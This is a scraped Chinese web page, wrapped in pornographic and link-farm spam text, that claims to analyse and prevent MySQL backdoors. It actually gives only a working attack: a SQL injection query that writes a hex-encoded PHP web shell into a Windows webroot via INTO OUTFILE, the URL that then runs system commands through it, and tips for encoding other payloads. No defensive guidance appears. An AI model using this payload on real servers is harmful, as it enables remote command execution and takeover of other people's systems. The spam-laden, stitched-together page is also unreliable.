国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數(shù)據(jù)庫 > MySQL > 正文

通過Mysql的語句生成后門木馬分析與防范

2024-07-24 12:57:32
字體:
供稿:網(wǎng)友

通過MySQL 的語句生成后門木馬的方法!

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通過Mysql 的注入或者在 phpmyadmin 里運(yùn)行以上語句,則會C:/inetpub/wwwroot/下生成 cmd.php 文件,內(nèi)容為原來的 vbb_strikes 內(nèi)容,后面緊跟著:

2 3 <?php system($_REQUEST[cmd]);?>

再通過 http://www.xxx.com/cmd.php?cmd=dir c:/ 就可以執(zhí)行系統(tǒng)DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么東西?

就是<?php system($_REQUEST[cmd]);?>的十六進(jìn)制編碼了,如果不用這種方法,有不同的SQL版本會出現(xiàn)其它的編碼:如%xx之類的,哪這個后門就不能執(zhí)行的了!如果你有其它語名要弄,可以到UltraEdit里輸入,再按[Ctrl+H]鍵,將里面的十六進(jìn)制連在一起就可以了!

發(fā)表評論 共有條評論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 库尔勒市| 仁化县| 京山县| 辽宁省| 浦东新区| 辽阳县| 八宿县| 资讯 | 涿州市| 孟州市| 宜州市| 岗巴县| 汉阴县| 凤冈县| 五华县| 扬中市| 东丽区| 象州县| 涟源市| 宁武县| 湘潭市| 明水县| 雅江县| 鄂伦春自治旗| 霍林郭勒市| 嘉祥县| 寿阳县| 农安县| 灯塔市| 青铜峡市| 仲巴县| 石台县| 建平县| 阿坝县| 博乐市| 镇原县| 广东省| 全南县| 同德县| 张家港市| 吴桥县|